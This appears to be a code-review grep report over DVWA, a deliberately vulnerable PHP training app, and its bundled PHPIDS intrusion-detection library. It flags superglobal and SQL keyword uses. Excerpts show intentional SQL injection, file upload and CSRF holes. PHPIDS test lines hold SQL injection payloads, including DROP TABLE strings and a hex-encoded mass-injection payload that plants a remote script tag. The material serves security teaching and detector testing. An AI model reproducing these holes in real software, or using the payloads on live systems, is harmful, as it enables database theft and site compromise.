./external/phpids/0.6/lib/IDS/Log/Composite.php:72 (7/18) OK | Dubious | Bad | Hide
69-    public function execute(IDS_Report $data) 
70-    {
71-    	// make sure request uri is set right on IIS
72:        if (!isset($_SERVER['REQUEST_URI'])) {
73:            $_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
74:            if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']) { 
75:                $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING']; 
76-            } 
77-        } 
78-        
79-        // make sure server address is set right on IIS
80:        if (isset($_SERVER['LOCAL_ADDR'])) {
81:            $_SERVER['SERVER_ADDR'] = $_SERVER['LOCAL_ADDR'];
82-        } 
83-    	
84-        foreach ($this->loggers as $logger) {
./external/phpids/0.6/lib/IDS/Log/File.php:90 (8/18) OK | Dubious | Bad | Hide
87-    {
88-
89-        // determine correct IP address
90:        if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
91:            $this->ip = $_SERVER['REMOTE_ADDR'];
92:        } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
93:            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
94-        }
95-
96-        $this->logfile = $logfile;
./external/phpids/0.6/lib/IDS/Log/File.php:163 (9/18) OK | Dubious | Bad | Hide
160-                              $data->getImpact(),
161-                              join(' ', $data->getTags()),
162-                              trim($attackedParameters),
163:                              urlencode($_SERVER['REQUEST_URI']),
164:                              $_SERVER['SERVER_ADDR']);
165-
166-        return $dataString;
167-    }
./external/phpids/0.6/lib/IDS/Log/Email.php:167 (10/18) OK | Dubious | Bad | Hide
164-        }
165-
166-        // determine correct IP address and concat them if necessary
167:        $this->ip = $_SERVER['REMOTE_ADDR'] .
168:            (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ?
169:            ' (' . $_SERVER['HTTP_X_FORWARDED_FOR'] . ')' : '');
170-    }
171-
172-    /**
./external/phpids/0.6/lib/IDS/Log/Email.php:237 (11/18) OK | Dubious | Bad | Hide
234-        * end deleting garbage files
235-        */
236-        $remoteAddr = $this->ip;
237:        $userAgent  = $_SERVER['HTTP_USER_AGENT'];
238-        $filename   = $this->file_prefix . md5($remoteAddr.$userAgent) . '.tmp';
239-        $file       = $dir . DIRECTORY_SEPARATOR . $filename;
240-
./external/phpids/0.6/lib/IDS/Log/Email.php:297 (12/18) OK | Dubious | Bad | Hide
294-                       $data->getImpact(),
295-                       join(' ', $data->getTags()),
296-                       trim($attackedParameters),
297:                       urlencode($_SERVER['REQUEST_URI']),
298:                       $_SERVER['SERVER_ADDR']);
299-    }
300-
301-    /**
./external/phpids/0.6/lib/IDS/Log/Database.php:163 (13/18) OK | Dubious | Bad | Hide
160-        }
161-
162-        // determine correct IP address
163:        if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
164:            $this->ip = $_SERVER['REMOTE_ADDR'];
165:        } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
166:            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
167-        }
168-
169-        try {
./external/phpids/0.6/lib/IDS/Log/Database.php:248 (14/18) OK | Dubious | Bad | Hide
245-     */
246-    public function execute(IDS_Report $data) 
247-    {
248:        if (!isset($_SERVER['REQUEST_URI'])) {
249:            $_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
250:            if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']) { 
251:                $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING']; 
252-            } 
253-        }     	
254-
255-        foreach ($data as $event) {
256:            $page = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
257-            $ip   = $this->ip;
258-
259-            $this->statement->bindParam('name', $event->getName());
./external/phpids/0.6/lib/IDS/Log/Database.php:264 (15/18) OK | Dubious | Bad | Hide
261-            $this->statement->bindParam('page', $page);
262-            $this->statement->bindParam('ip', $ip);
263-            $this->statement->bindParam('impact', $data->getImpact());
264:            $this->statement->bindParam('origin', $_SERVER['SERVER_ADDR']);
265-
266-            if (!$this->statement->execute()) {
267-
./dvwa/includes/dvwaPage.inc.php:139 (16/18) OK | Dubious | Bad | Hide
136-
137-function dvwaPageReload() {
138-
139:	dvwaRedirect( $_SERVER[ 'PHP_SELF' ] );
140-
141-}
142-
./dvwa/includes/DBMS/PGSQL.php:56 (17/18) OK | Dubious | Bad | Hide
53-dvwaMessagePush( "'users' table was created." );
54-
55-// Get the base directory for the avatar media...
56:$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ];
57-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
./dvwa/includes/DBMS/MySQL.php:47 (18/18) OK | Dubious | Bad | Hide
44-// Insert some data into users
45-
46-// Get the base directory for the avatar media...
47:$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ];
48-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-

$_COOKIE (13) Top | Hide

./vulnerabilities/csrf/index.php:15 (1/13) OK | Dubious | Bad | Hide
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/fi/index.php:15 (2/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE['security'] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/sqli_blind/index.php:15 (3/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/brute/index.php:15 (4/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/exec/index.php:15 (5/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/upload/index.php:15 (6/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/sqli/index.php:15 (7/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/xss_s/index.php:15 (8/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/xss_r/index.php:15 (9/13) OK | Dubious | Bad | Hide
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./external/phpids/0.6/docs/examples/example.php:45 (10/13) OK | Dubious | Bad | Hide
42-        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44-        'POST' => $_POST,
45:        'COOKIE' => $_COOKIE
46-    );
47-
48-    $init = IDS_Init::init(dirname(__FILE__) . '/../../lib/IDS/Config/Config.ini');
./dvwa/includes/dvwaPage.inc.php:28 (11/13) OK | Dubious | Bad | Hide
25-
26-
27-// Set security cookie to high if no cookie exists
28:if (!isset($_COOKIE['security'])){
29-
30-	setcookie( 'security', 'high' );
31-
./dvwa/includes/dvwaPage.inc.php:170 (12/13) OK | Dubious | Bad | Hide
167-
168-function dvwaSecurityLevelGet() {
169-
170:	return isset( $_COOKIE[ 'security' ] ) ? $_COOKIE[ 'security' ] : 'high';
171-
172-}
173-
./dvwa/includes/dvwaPhpIds.inc.php:60 (13/13) OK | Dubious | Bad | Hide
57-			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59-			'POST' => $_POST,
60:			'COOKIE' => $_COOKIE
61-		);
62-
63-		$init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/Config/Config.ini' );

$_FILES (3) Top | Hide

./vulnerabilities/upload/source/low.php:5 (1/3) OK | Dubious | Bad | Hide
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
6-
7:			if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
8-				
9-				$html .= '<pre>';
10-				$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/high.php:5 (2/3) OK | Dubious | Bad | Hide
2-if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename($_FILES['uploaded']['name']);
6:			$uploaded_name = $_FILES['uploaded']['name'];
7-			$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
8:			$uploaded_size = $_FILES['uploaded']['size'];
9-
10-			if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-					
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/medium.php:5 (3/3) OK | Dubious | Bad | Hide
2-	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename($_FILES['uploaded']['name']);
6:			$uploaded_name = $_FILES['uploaded']['name'];
7:			$uploaded_type = $_FILES['uploaded']['type'];
8:			$uploaded_size = $_FILES['uploaded']['size'];
9-
10-			if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-				
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';

SELECT (22) Top | Hide

./login.php:23 (1/22) OK | Dubious | Bad | Hide
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./vulnerabilities/csrf/source/high.php:16 (2/22) OK | Dubious | Bad | Hide
13-		$pass_curr = md5( $pass_curr );
14-		
15-		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
./vulnerabilities/sqli_blind/source/low.php:9 (3/22) OK | Dubious | Bad | Hide
6-	
7-	$id = $_GET['id'];
8-
9:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
11-
12-	$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/sqli_blind/source/high.php:13 (4/22) OK | Dubious | Bad | Hide
10-
11-	if (is_numeric($id)) {
12-
13:		$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
14-		$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
15-
16-		$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/sqli_blind/source/medium.php:10 (5/22) OK | Dubious | Bad | Hide
7-	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
11-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
12-	
13-	$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/brute/source/low.php:10 (6/22) OK | Dubious | Bad | Hide
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:16 (7/22) OK | Dubious | Bad | Hide
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/medium.php:14 (8/22) OK | Dubious | Bad | Hide
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./vulnerabilities/sqli/source/low.php:9 (9/22) OK | Dubious | Bad | Hide
6-	
7-	$id = $_GET['id'];
8-
9:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
11-
12-	$num = mysql_numrows($result);
./vulnerabilities/sqli/source/high.php:13 (10/22) OK | Dubious | Bad | Hide
10-
11-	if (is_numeric($id)){
12-
13:		$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
14-		$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
15-
16-		$num = mysql_numrows($result);
./vulnerabilities/sqli/source/medium.php:10 (11/22) OK | Dubious | Bad | Hide
7-	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
11-
12-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
13-
./external/phpids/0.6/tests/IDS/MonitorTest.php:605 (12/22) OK | Dubious | Bad | Hide
602-        $exploits[] = '; DROP table Users --';
603-        $exploits[] = '/**/S/**/E/**/L/**/E/**/C/**/T * FROM users WHERE 1 = 1';
604-        $exploits[] = 'admin\'--';
605:        $exploits[] = 'SELECT /*!32302 1/0, */ 1 FROM tablename';
606-        $exploits[] = '10;DROP members --';
607:        $exploits[] = ' SELECT IF(1=1,\'true\',\'false\')';
608:        $exploits[] = 'SELECT CHAR(0x66)';
609:        $exploits[] = 'SELECT LOAD_FILE(0x633A5C626F6F742E696E69)';
610-        $exploits[] = 'EXEC(@stored_proc @param)';
611-        $exploits[] = 'chr(11)||chr(12)||char(13)';
612:        $exploits[] = 'MERGE INTO bonuses B USING (SELECT';
613-        $exploits[] = '1 or name like \'%\'';
614-        $exploits[] = '1 OR \'1\'!=0';
615-        $exploits[] = '1 OR ASCII(2) = ASCII(2)';
./external/phpids/0.6/tests/IDS/MonitorTest.php:909 (13/22) OK | Dubious | Bad | Hide
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909:        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
./external/phpids/0.6/lib/IDS/Caching/Database.php:151 (14/22) OK | Dubious | Bad | Hide
148-
149-        $handle = $this->handle;
150-        
151:        $rows = $handle->query('SELECT created FROM `' . 
152-            $handle->quote($this->config['table']).'`');
153-            
154-        if (!$rows || $rows->rowCount() === 0) {
./external/phpids/0.6/lib/IDS/Caching/Database.php:186 (15/22) OK | Dubious | Bad | Hide
183-
184-        try{
185-            $handle = $this->handle;
186:            $result = $handle->prepare('SELECT * FROM ' . 
187-                $handle->quote($this->config['table']) . 
188-                ' where type=?');
189-            $result->execute(array($this->type));
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:1219 (16/22) OK | Dubious | Bad | Hide
1216-    const IN_TBODY   = 7;
1217-    const IN_ROW     = 8;
1218-    const IN_CELL    = 9;
1219:    const IN_SELECT  = 10;
1220-    const AFTER_BODY = 11;
1221-    const IN_FRAME   = 12;
1222-    const AFTR_FRAME = 13;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:1391 (17/22) OK | Dubious | Bad | Hide
1388-                case self::IN_TBODY:   return $this->inTableBody($token); break;
1389-                case self::IN_ROW:     return $this->inRow($token); break;
1390-                case self::IN_CELL:    return $this->inCell($token); break;
1391:                case self::IN_SELECT:  return $this->inSelect($token); break;
1392-                case self::AFTER_BODY: return $this->afterBody($token); break;
1393-                case self::IN_FRAME:   return $this->inFrameset($token); break;
1394-                case self::AFTR_FRAME: return $this->afterFrameset($token); break;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:2130 (18/22) OK | Dubious | Bad | Hide
2127-                    $this->insertElement($token);
2128-
2129-                    /* Change the insertion mode to "in select". */
2130:                    $this->mode = self::IN_SELECT;
2131-                break;
2132-
2133-                /* A start or end tag whose tag name is one of: "caption", "col",
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3809 (19/22) OK | Dubious | Bad | Hide
3806-            /* 4. If node is a select element, then switch the insertion mode to
3807-            "in select" and abort these steps. (innerHTML case) */
3808-            if($node->nodeName === 'select') {
3809:                $this->mode = self::IN_SELECT;
3810-                break;
3811-
3812-            /* 5. If node is a td or th element, then switch the insertion mode
./dvwa/includes/dvwaPage.inc.php:567 (20/22) OK | Dubious | Bad | Hide
564-// XSS Stored guestbook function --
565-function dvwaGuestbook(){
566-
567:	$query  = "SELECT name, comment FROM guestbook";
568-	$result = mysql_query($query);
569-
570-	$guestbook = '';
./dvwa/includes/DBMS/DBMS.php:21 (21/22) OK | Dubious | Bad | Hide
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-
./dvwa/includes/DBMS/DBMS.php:45 (22/22) OK | Dubious | Bad | Hide
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-

INSERT (9) Top | Hide

./vulnerabilities/xss_s/source/low.php:16 (1/9) OK | Dubious | Bad | Hide
14-   $name = mysql_real_escape_string($name);
15-  
16:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
17-   
18-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
19-
./vulnerabilities/xss_s/source/high.php:19 (2/9) OK | Dubious | Bad | Hide
16-   $name = mysql_real_escape_string($name); 
17-   $name = htmlspecialchars($name);
18-  
19:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
20-   
21-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
22-
./vulnerabilities/xss_s/source/medium.php:18 (3/9) OK | Dubious | Bad | Hide
15-   $name = str_replace('<script>', '', $name);
16-   $name = mysql_real_escape_string($name);
17-  
18:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
19-   
20-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
21-
./external/phpids/0.6/lib/IDS/Caching/Database.php:251 (4/9) OK | Dubious | Bad | Hide
248-            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251:                INSERT INTO `' . 
252-                $this->config['table'].'` (
253-                    type,
254-                    data,
./external/phpids/0.6/lib/IDS/Log/Database.php:177 (5/9) OK | Dubious | Bad | Hide
174-            );
175-
176-            $this->statement = $this->handle->prepare('
177:                INSERT INTO ' . $this->table . ' (
178-                    name,
179-                    value,
180-                    page,
./dvwa/includes/DBMS/PGSQL.php:60 (6/9) OK | Dubious | Bad | Hide
57-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
60:$insert = "INSERT INTO users VALUES
61-	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
62-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
63-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
./dvwa/includes/DBMS/PGSQL.php:92 (7/9) OK | Dubious | Bad | Hide
89-dvwaMessagePush( "'guestbook' table was created." );
90-
91-// Insert data into 'guestbook'
92:$insert = "INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')";
93-
94-if( !pg_query( $insert ) ){
95-	dvwaMessagePush( "Data could not be inserted into 'guestbook' table<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/MySQL.php:51 (8/9) OK | Dubious | Bad | Hide
48-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-
51:$insert = "INSERT INTO users VALUES
52-	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
53-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
54-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
./dvwa/includes/DBMS/MySQL.php:74 (9/9) OK | Dubious | Bad | Hide
71-dvwaMessagePush( "'guestbook' table was created." );
72-	
73-// Insert data into 'guestbook'
74:$insert = "INSERT INTO guestbook VALUES
75-('1','This is a test comment.','test');";
76-	
77-if( !mysql_query( $insert ) ){

UPDATE (4) Top | Hide

./vulnerabilities/csrf/source/low.php:14 (1/4) OK | Dubious | Bad | Hide
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:23 (2/4) OK | Dubious | Bad | Hide
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/medium.php:16 (3/4) OK | Dubious | Bad | Hide
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./external/phpids/0.6/tests/IDS/MonitorTest.php:900 (4/4) OK | Dubious | Bad | Hide
897-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
898-                        where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
899-                        OPEN tablecursor FETCH NEXT FROM tablecursor INTO @a,@b WHILE(@a != null)
900:                        @query  = null+null+null+null+ ' UPDATE '+null+@a+null+ ' SET id=null,@b = @payload'
901-                        BEGIN EXEC sp_executesql @query
902-                        FETCH NEXT FROM tablecursor INTO @a,@b END
903-                        CLOSE tablecursor DEALLOCATE tablecursor;
904-                        and some text, to get pass the centrifuge; and some more text.";
905:        $exploits[] = "@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'";
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';

DELETE (1) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:102 (1/1) OK | Dubious | Bad | Hide
100-                           );
101-            } else {
102:                // system never heard of the attribute? DELETE!
103-                $result = false;
104-            }
105-

DROP (7) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:602 (1/7) OK | Dubious | Bad | Hide
600-        $exploits = array();
601-        $exploits[] = '" OR 1=1#';
602:        $exploits[] = '; DROP table Users --';
603-        $exploits[] = '/**/S/**/E/**/L/**/E/**/C/**/T * FROM users WHERE 1 = 1';
604-        $exploits[] = 'admin\'--';
605-        $exploits[] = 'SELECT /*!32302 1/0, */ 1 FROM tablename';
606:        $exploits[] = '10;DROP members --';
607-        $exploits[] = ' SELECT IF(1=1,\'true\',\'false\')';
608-        $exploits[] = 'SELECT CHAR(0x66)';
609-        $exploits[] = 'SELECT LOAD_FILE(0x633A5C626F6F742E696E69)';
./external/phpids/0.6/lib/IDS/Caching/Database.php:44 (2/7) OK | Dubious | Bad | Hide
41-
42-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
44:    DROP TABLE IF EXISTS `cache`;
45-
46-    #now select the created datbase and create the table
47-
./external/phpids/0.6/lib/IDS/Log/Database.php:41 (3/7) OK | Dubious | Bad | Hide
38- *
39-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
40-        SET utf8 COLLATE utf8_general_ci;
41:    DROP TABLE IF EXISTS `intrusions`;
42-    CREATE TABLE IF NOT EXISTS `intrusions` (
43-      `id` int(11) unsigned NOT null auto_increment,
44-      `name` varchar(128) NOT null,
./dvwa/includes/DBMS/PGSQL.php:16 (4/7) OK | Dubious | Bad | Hide
13-}
14-
15-// Create database
16:$drop_db = "DROP DATABASE IF EXISTS dvwa;";
17-
18-if( !@pg_query($drop_db) ) {
19-	dvwaMessagePush( "Could not drop existing database<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:39 (5/7) OK | Dubious | Bad | Hide
36-	
37-// Create table 'users'
38-
39:$drop_table = "DROP TABLE IF EXISTS users;";
40-
41-if( !pg_query($drop_table) ) {
42-	dvwaMessagePush( "Could not drop existing users table<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:75 (6/7) OK | Dubious | Bad | Hide
72-
73-// Create guestbook table
74-
75:$drop_table = "DROP table IF EXISTS guestbook;";
76-
77-if( !@pg_query($drop_table) ) {
78-	dvwaMessagePush( "Could not drop existing users table<br />SQL: " . pg_last_error() );
